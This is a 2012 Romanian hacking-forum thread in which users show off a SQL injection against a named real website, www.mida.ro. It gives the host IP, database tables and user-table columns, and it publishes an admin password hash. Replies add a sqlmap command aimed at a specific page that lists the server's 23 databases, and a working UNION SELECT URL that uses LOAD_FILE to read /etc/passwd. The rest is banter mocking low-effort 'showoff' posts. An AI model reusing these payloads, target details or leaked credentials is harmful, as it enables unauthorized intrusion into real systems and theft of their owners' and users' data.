[SQLi] www.mida.ro

.Slacker · September 23, 2012

[+]Target:

www.mida.ro

[+]Author: .Slacker

[+]Host IP: 46.51.108.12

[+]Version: 5.1.47

[+]Injection-Type: Union Based

[+]Current DB: mida

[+]Tables:


CHARACTER_SETS,                                    
COLLATIONS,                                           
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
ENGINES,
EVENTS,
FILES,
GLOBAL_STATUS,
GLOBAL_VARIABLES,
KEY_COLUMN_USAGE,
PARTITIONS,
PLUGINS,
PROCESSLIST,
PROFILING,
REFERENTIAL_CONSTRAINTS,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
SESSION_STATUS,
SESSION_VARIABLES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
adm,
anexe,
arhiva,
articol,
categorii,
categorii_arhiva,
categorii_stiri,
contact,
flash,
linkuri,
pagini,
parteneri,
subcategorii,
users,
7wx4rt5_aicontactsafe_config,
7wx4rt5_aicontactsafe_contactinformations,
7wx4rt5_aicontactsafe_fields,
7wx4rt5_aicontactsafe_fieldvalues,
7wx4rt5_aicontactsafe_messagefiles,
7wx4rt5_aicontactsafe_messages,
7wx4rt5_aicontactsafe_profiles,
7wx4rt5_aicontactsafe_statuses,
7wx4rt5_banner,
7wx4rt5_bannerclient,
7wx4rt5_ban

[+]Columns for users:


id,
user,
parola,
nume,
prenume,
adresa,
localitate,
telefon,
email,
data,
id,
nev,
knev,
unev,
password,
megye,
telepules,
cim,
ci,
aktiv,
email,
id,
externid,
objectclass,
signature,
company

Site-ul este plin de vulnerabilitati, deci imi voi permite sa fac publice datele de logare:


+-------------------------------------------------+
| Name:        Password:                          |
| Admin        80f8e70b29c5966a919c38e0ca57c571   |
+-------------------------------------------------+

EOF · September 24, 2012

Super!

Postezi si sintaxa?

Merci!

September 24, 2012

"Site-ul este plin de vulnerabilitati, deci imi

voi permite sa fac publice datele de logare"

Ce criteriu stupid .

aelius · September 24, 2012

Super!
Postezi si sintaxa?
Merci!

Ce sintaxa vrei frate, nu te uiti ce scrie la el la location ? Toata treaba aia a durat doua secunde. Ce ca**t de hacking e asta ? A luat un link si a dat cu sqlmap pe el


hp ~ # sqlmap -u "http://www.mida.ro/content.php?id=21" --dbs --union-use

    sqlmap/0.8 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 23:48:13

...............

web server operating system: Linux Fedora
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5

[23:48:14] [INFO] fetching database names
available databases [23]:
[*] ambalaj_ccihr
[*] costides_cartuse
[*] costides_corvina
[*] costides_dekoratex
[*] costides_sazy
[*] costides_transilva
[*] csalad
[*] csikisport
[*] hardwarecenter_hc
[*] hardwarecenter_szamla
[*] information_schema
[*] markbi
[*] mida
[*] munkacsy
[*] mysql
[*] parfum
[*] parfumworld
[*] salvator
[*] syrinx
[*] test
[*] twinart
[*] vkv
[*] zarafa

gata frate, am dat o comanda si sunt hacker, o sa fiu in imparatia cerului, ia sa-l pun inca odata pe show off pe RST, poate o sa capat respectul baietilor, ca sunt bazat :))

Edited September 24, 2012 by aelius

fallen_angel · September 24, 2012

Tex, teach me ! Ce face --union-use ? C? ?i io folosesc sqlmap, dar se pare c?-s n00b :-?

blackboy-1337- · September 24, 2012

Ce, cacat e asa greu sa-l faci manual ? E un sqli basic.

aelius · September 24, 2012

;391688']Ce' date=' cacat e asa greu sa-l faci manual ? E un sqli basic.[/quote']
Pai ala nu stie nicio comanda mysql bre. Baga link-ul, da cu click-ul si gata

Parker · September 24, 2012

Pana sa intru in link am crezut ca e vorba de un site serios. Dar inainte sa intru pe site m-am uitat la utilizator si mi-am dat seama ca nu poate fi un site serios!

Wubi · September 24, 2012

http://www.mida.ro/content.php?id=-11+UNION+SELECT+1,2,LOAD_FILE(0x2f6574632f706173737764),4

EOF · September 24, 2012

Va multumesc foarte mult. Toate cele bune!

abraxyss · September 25, 2012

----------------+
| Name: Password: |
| Admin 80f8e70b29c5966a919c38e0ca57c571 |
+-------------------------------------------------+

ups , sry , m-a mancat update-ul

.Slacker · September 25, 2012

Bre nene, location-ul meu este pus asa de ochii lumii. Nu am folosit sqlmap sau vreun soft! Totul a fost facut manual

@tex si cum ai ajuns tu la concluzia ca nu stiu nici o comanda mysql?

September 25, 2012

Ba, eu am ceva de zis, nu stiu daca voi v-ati saturat sau nu de showoff-uri cu sql"i" dar eu personal m-am scarbit sa vad :

"lumea-copiilor.ro SQLI" WTF?!? cand vii cu un sqli (manual) in ceva ce sa merite atentia si timpul nostru de a citi cacatu ala de topic, atunci se poate numi showoff.

Momentan, ceea ce se posteaza pe la showoff sunt numai rable de siteuri cu admini mutalai care joaca Metin 8.

Asa ca eu propun ca, cine mai face post la showoff cu rable de siteuri primeste ban 1 saptamana.

Cine face sqli la un site mai de "Doamne, ajuta" si nu posteaza si sintaxa primeste ban 1 saptamana.

In categoria siteuri de "Doamne ajuta" nu intra "moloz.tk, lumea-copiilor.ro, gradinita-sector2.ro suruburi.si.piulite.net etc,etc.

Cine e de parere cu mos ps sa urle aici.

ps. intr-e timp... trash.

Sign In

[SQLi] www.mida.ro

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Guest Kovalski

Link to comment

Share on other sites

Join the conversation